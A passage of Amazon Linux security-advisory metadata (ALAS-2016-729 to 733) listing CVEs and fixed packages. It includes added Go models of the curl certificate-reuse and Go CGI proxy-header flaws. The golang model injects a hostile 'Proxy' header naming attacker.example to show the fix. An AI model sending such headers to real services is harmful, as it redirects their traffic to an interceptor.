epoch="0" arch="i686"><filename>Packages/php56-mcrypt-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" 
version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-pdo" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pdo-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-xml" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xml-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-dba" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-dba-5.6.24-1.126.amzn1.i686.rpm</filename></package><package name="php56-mysqlnd" version="5.6.24" release="1.126.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mysqlnd-5.6.24-1.126.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-729</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-729: important priority package update for java-1.7.0-openjdk</title><issued date="2016-08-01 13:30:00" /><updated date="2016-08-01 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-3610:
Unspecified vulnerability in Oracle Java SE 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Libraries, a different vulnerability than CVE-2016-3598.
1356994:
CVE-2016-3610 OpenJDK: insufficient value count check in MethodHandles.filterReturnValue() (Libraries, 8158571)
CVE-2016-3606:
Unspecified vulnerability in Oracle Java SE 7u101 and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Hotspot.
1356963:
CVE-2016-3606 OpenJDK: insufficient bytecode verification (Hotspot, 8155981)
CVE-2016-3598:
Unspecified vulnerability in Oracle Java SE 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Libraries, a different vulnerability than CVE-2016-3610.
1356971:
CVE-2016-3598 OpenJDK: incorrect handling of MethodHandles.dropArguments() argument (Libraries, 8155985)
CVE-2016-3550:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92 and Java SE Embedded 8u91 allows remote attackers to affect confidentiality via vectors related to Hotspot.
1357506:
CVE-2016-3550 OpenJDK: integer overflows in bytecode streams (Hotspot, 8152479)
CVE-2016-3508:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3500.
1357015:
CVE-2016-3508 OpenJDK: missing entity replacement limits (JAXP, 8149962)
CVE-2016-3500:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; Java SE Embedded 8u91; and JRockit R28.3.10 allows remote attackers to affect availability via vectors related to JAXP, a different vulnerability than CVE-2016-3508.
1357008:
CVE-2016-3500 OpenJDK: maximum XML name limit not applied to namespace URIs (JAXP, 8148872)
CVE-2016-3458:
Unspecified vulnerability in Oracle Java SE 6u115, 7u101, and 8u92; and Java SE Embedded 8u91 allows remote attackers to affect integrity via vectors related to CORBA.
1357494:
CVE-2016-3458 OpenJDK: insufficient restrictions on the use of custom ValueHandler (CORBA, 8079718)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3458" title="" id="CVE-2016-3458" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3500" title="" id="CVE-2016-3500" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3508" title="" id="CVE-2016-3508" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3550" title="" id="CVE-2016-3550" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3598" title="" id="CVE-2016-3598" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3606" title="" id="CVE-2016-3606" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3610" title="" id="CVE-2016-3610" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.7.0-openjdk" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.111-2.6.7.2.68.amzn1.x86_64.rpm</filename></package><package name="java-1.7.0-openjdk-javadoc" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.7.0-openjdk-javadoc-1.7.0.111-2.6.7.2.68.amzn1.noarch.rpm</filename></package><package name="java-1.7.0-openjdk-devel" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-devel-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-debuginfo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-debuginfo-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-demo" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-demo-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package><package name="java-1.7.0-openjdk-src" version="1.7.0.111" release="2.6.7.2.68.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.7.0-openjdk-src-1.7.0.111-2.6.7.2.68.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-730</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-730: medium priority package update for curl</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5421:
Use-after-free vulnerability in libcurl before 7.50.1 allows attackers to control which connection is used or possibly have unspecified other impact via unknown vectors.
1362199:
CVE-2016-5421 curl: Use of connection struct after free
CVE-2016-5420:
curl and libcurl before 7.50.1 do not check the client certificate when choosing the TLS connection to reuse, which might allow remote attackers to hijack the authentication of the connection by leveraging a previously created connection with a different client certificate.
1362190:
CVE-2016-5420 curl: Re-using connection with wrong client cert
CVE-2016-5419:
curl and libcurl before 7.50.1 do not prevent TLS session resumption when the client certificate has changed, which allows remote attackers to bypass intended restrictions by resuming a session.
1362183:
CVE-2016-5419 curl: TLS session resumption client cert bypass
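The two client-certificate issues above (CVE-2016-5420 and CVE-2016-5419) are one bug class: a client-side cache keyed on too little. The model below is an added illustration written for this advisory in Go, not curl or libcurl code; the pool, the host name api.example:443 and the throwaway self-signed certificates for "alice" and "bob" are all constructed here. With ignoreClientCert set the pool keys connections on host:port only, as libcurl did before 7.50.1, so a request that asked to authenticate as bob is served on the connection the server already attributed to alice. With it unset the key also carries the SHA-256 fingerprint of the requested client certificate, and bob gets a fresh handshake. The same rule applies to the TLS session cache behind CVE-2016-5419: a session created under one client certificate must not be resumed for a request that wants another, which is why the fix keys session reuse on the certificate as well.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"crypto/x509"
	"crypto/x509/pkix"
	"encoding/hex"
	"fmt"
	"math/big"
	"time"
)

// selfSignedCert returns the DER encoding of a throwaway self-signed client
// certificate for cn. Constructed test data only; a new key every call.
func selfSignedCert(cn string) []byte {
	priv, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	if err != nil {
		panic(err)
	}
	tmpl := new(x509.Certificate)
	tmpl.SerialNumber = big.NewInt(1)
	tmpl.Subject = pkix.Name{CommonName: cn}
	tmpl.NotBefore = time.Now()
	tmpl.NotAfter = time.Now().Add(time.Hour)
	der, err := x509.CreateCertificate(rand.Reader, tmpl, tmpl, priv.Public(), priv)
	if err != nil {
		panic(err)
	}
	return der
}

// fingerprint is the SHA-256 of the DER certificate: the identity the server
// binds to a connection after a successful client-authenticated handshake.
func fingerprint(der []byte) string {
	sum := sha256.Sum256(der)
	return hex.EncodeToString(sum[:])
}

// connKey is everything the pool compares when deciding whether an existing
// connection may carry a new request.
type connKey struct {
	hostPort   string
	clientCert string // fingerprint of the requested client certificate, "" when ignored
}

// pool is a toy client-side connection cache (hypothetical, not libcurl's).
// ignoreClientCert == true reproduces the pre-7.50.1 flaw: host:port is the whole key.
type pool struct {
	ignoreClientCert bool
	live             map[connKey]string // key -> fingerprint the server authenticated on it
}

func newPool(ignoreClientCert bool) *pool {
	p := new(pool)
	p.ignoreClientCert = ignoreClientCert
	p.live = map[connKey]string{}
	return p
}

func (p *pool) key(hostPort string, clientCert []byte) connKey {
	k := connKey{hostPort: hostPort}
	if p.ignoreClientCert {
		return k
	}
	if clientCert != nil {
		k.clientCert = fingerprint(clientCert)
	}
	return k
}

// connect returns the identity the server will attribute to this request and
// whether an already-open connection was reused to carry it. A fresh handshake
// presents exactly the certificate the caller asked for.
func (p *pool) connect(hostPort string, clientCert []byte) (identity string, reused bool) {
	k := p.key(hostPort, clientCert)
	if id, ok := p.live[k]; ok {
		return id, true
	}
	id := ""
	if clientCert != nil {
		id = fingerprint(clientCert)
	}
	p.live[k] = id
	return id, false
}

// demo replays the advisory scenario: request 1 authenticates as alice, request 2
// asks for bob's certificate to the same host. It reports the identity the server
// sees for request 2 and whether that request silently rode alice's connection.
func demo(ignoreClientCert bool) (request2Identity string, servedAsAlice bool) {
	alice := selfSignedCert("alice")
	bob := selfSignedCert("bob")
	p := newPool(ignoreClientCert)
	aliceID, _ := p.connect("api.example:443", alice)
	bobID, reused := p.connect("api.example:443", bob)
	if reused {
		if bobID == aliceID {
			servedAsAlice = true
		}
	}
	return bobID, servedAsAlice
}

func main() {
	_, wrong := demo(true)
	fmt.Println("key = host:port only, bob served as alice:", wrong)
	_, wrong = demo(false)
	fmt.Println("key = host:port + client cert, bob served as alice:", wrong)
}
```

The check to carry into any client library or service mesh you own: enumerate every parameter that changes who the server thinks you are (client certificate, SNI, pinned CA, proxy, credentials) and confirm each one is part of the connection-cache and session-cache key.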
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5419" title="" id="CVE-2016-5419" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5420" title="" id="CVE-2016-5420" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5421" title="" id="CVE-2016-5421" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-8.59.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-8.59.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-8.59.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-8.59.amzn1.i686.rpm</filename></package><package name="curl" version="7.40.0" release="8.59.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-8.59.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-731</id><title>Amazon Linux AMI 2014.03 - 
ALAS-2016-731: medium priority package update for golang</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5386:
An input-validation flaw was discovered in the Go programming language's built-in CGI implementation, which set the environment variable &quot;HTTP_PROXY&quot; using the incoming &quot;Proxy&quot; HTTP-request header. The environment variable &quot;HTTP_PROXY&quot; is used by numerous web clients, including Go&#039;s net/http package, to specify a proxy server to use for HTTP and, in some cases, HTTPS requests. This meant that when a CGI-based web application ran, an attacker could specify a proxy server which the application then used for subsequent outgoing requests, allowing a man-in-the-middle attack.
1353798:
CVE-2016-5386 Go: sets environmental variable based on user supplied Proxy request header
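The mechanism the advisory describes, as an added Go example written for this page (not code from the Go project or from the Amazon package): a CGI host turns request headers into HTTP_* meta-variables per RFC 3875, so a hostile "Proxy" header becomes HTTP_PROXY in the child's environment, where the application's own HTTP client then honours it. The request, its header values and the host name app.example are constructed here. Both halves of the upstream remedy are modelled: the host never exports the "Proxy" header, and a CGI-aware client refuses HTTP_PROXY whenever REQUEST_METHOD is present, since that marks the process as a CGI script whose environment is partly attacker-supplied.

```go
package main

import (
	"fmt"
	"net/http"
	"sort"
	"strings"
)

// cgiEnv builds the meta-variables a CGI host hands to the child for one request:
// REQUEST_METHOD plus one HTTP_NAME entry per request header, following
// RFC 3875 section 4.1.18 (uppercase, '-' replaced by '_').
// dropProxy == false reproduces the flaw: a client-supplied "Proxy" header is
// exported as HTTP_PROXY. dropProxy == true applies the host-side fix.
func cgiEnv(r *http.Request, dropProxy bool) []string {
	env := []string{"REQUEST_METHOD=" + r.Method}
	for name, values := range r.Header {
		if dropProxy {
			if http.CanonicalHeaderKey(name) == "Proxy" {
				continue
			}
		}
		metaVar := "HTTP_" + strings.ToUpper(strings.ReplaceAll(name, "-", "_"))
		env = append(env, metaVar+"="+strings.Join(values, ", "))
	}
	sort.Strings(env) // map iteration order is random; make the result deterministic
	return env
}

// proxyFromEnv models an HTTP client library inside the CGI child consulting its
// environment for a proxy. cgiAware == true models the client-side hardening:
// if REQUEST_METHOD is set, the process is a CGI script and HTTP_PROXY is ignored.
func proxyFromEnv(env []string, cgiAware bool) string {
	proxy := ""
	inCGI := false
	for _, kv := range env {
		if strings.HasPrefix(kv, "HTTP_PROXY=") {
			proxy = strings.TrimPrefix(kv, "HTTP_PROXY=")
		}
		if strings.HasPrefix(kv, "REQUEST_METHOD=") {
			inCGI = true
		}
	}
	if cgiAware {
		if inCGI {
			return ""
		}
	}
	return proxy
}

// attackerRequest is a constructed request carrying the hostile header;
// the application URL and the proxy host:port are hypothetical.
func attackerRequest() *http.Request {
	req, err := http.NewRequest("GET", "http://app.example/cgi-bin/lookup", nil)
	if err != nil {
		panic(err)
	}
	req.Header.Set("Proxy", "attacker.example:3128")
	req.Header.Set("Accept-Encoding", "gzip")
	return req
}

// outboundProxy answers the question the advisory raises: which proxy will the
// CGI application's own outgoing requests use, for a given fix state on each side?
func outboundProxy(hostDropsProxyHeader, clientIsCGIAware bool) string {
	env := cgiEnv(attackerRequest(), hostDropsProxyHeader)
	return proxyFromEnv(env, clientIsCGIAware)
}

func main() {
	fmt.Println("unpatched host, unpatched client:", outboundProxy(false, false))
	fmt.Println("patched host:                    ", outboundProxy(true, false))
	fmt.Println("unpatched host, patched client:  ", outboundProxy(false, true))
}
```

Either side alone closes the hole for this pairing, but only the host-side fix protects non-Go clients (shell tools, other language runtimes) that the CGI script may spawn and that also read HTTP_PROXY, so patch the host and keep the client check as defence in depth.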
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5386" title="" id="CVE-2016-5386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-docs" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang-src" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang" version="1.5.3" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.5.3-1.22.amzn1.x86_64.rpm</filename></package><package name="golang-tests" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang-misc" version="1.5.3" release="1.22.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.5.3-1.22.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.5.3" release="1.22.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.5.3-1.22.amzn1.x86_64.rpm</filename></package><package name="golang-bin" version="1.5.3" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.5.3-1.22.amzn1.i686.rpm</filename></package><package name="golang" version="1.5.3" release="1.22.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.5.3-1.22.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-732</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-732: medium priority package update for samba</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the 
following vulnerabilities:
CVE-2016-2119:
A flaw was found in the way Samba initiated signed DCE/RPC connections. A man-in-the-middle attacker could use this flaw to downgrade the connection to not use signing and therefore impersonate the server.
1351955:
CVE-2016-2119 samba: Client side SMB2/3 required signing can be downgraded
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2119" title="" id="CVE-2016-2119" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ctdb-tests" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package 
name="samba-winbind-modules" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-python" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.10" release="7.34.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.10-7.34.amzn1.noarch.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" 
version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.10" release="7.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.10-7.34.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.10" release="7.34.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.10-7.34.amzn1.noarch.rpm</filename></package><package name="samba-test" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.2.10" release="7.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-winbind-modules-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="libwbclient" 
version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.10-7.34.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.10" release="7.34.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.10-7.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-733</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-733: important priority package update for libtiff</title><issued date="2016-08-17 13:30:00" /><updated date="2016-08-17 13:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5320:
1346687:
CVE-2016-5320 libtiff: Out-of-bounds write in PixarLogDecode() function in tif_pixarlog.c
CVE-2016-3991:
1326249:
CVE-2016-3991 libtiff: out-of-bounds write in loadImage() function
CVE-2016-3990:
1326246:
CVE-2016-3990 libtiff: out-of-bounds write in horizontalDifference8()
CVE-2016-3945:
1325093:
CVE-2016-3945 libtiff: out-of-bounds write in the tiff2rgba tool
CVE-2016-3632:
1325095:
CVE-2016-3632 libtiff: out-of-bounds write in _TIFFVGetField function
CVE-2015-8784:
The NeXTDecode function in tif_next.c in LibTIFF allows remote attackers to cause a denial of service (out-of-bounds write) via a crafted TIFF image, as demonstrated by libtiff5.tif.
1301652:
CVE-2015-8784 libtiff: out-of-bound write in NeXTDecode()
CVE-2015-8783:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds reads) via a crafted TIFF image.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8782:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds writes) via a crafted TIFF image, a different vulnerability than CVE-2015-8781.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8781:
tif_luv.c in libtiff allows attackers to cause a denial of service (out-of-bounds write) via an invalid number of samples per pixel in a LogL compressed TIFF image, a different vulnerability than CVE-2015-8782.
1301649:
CVE-2015-8781 CVE-2015-8782 CVE-2015-8783 libtiff: invalid assertion
CVE-2015-8683:
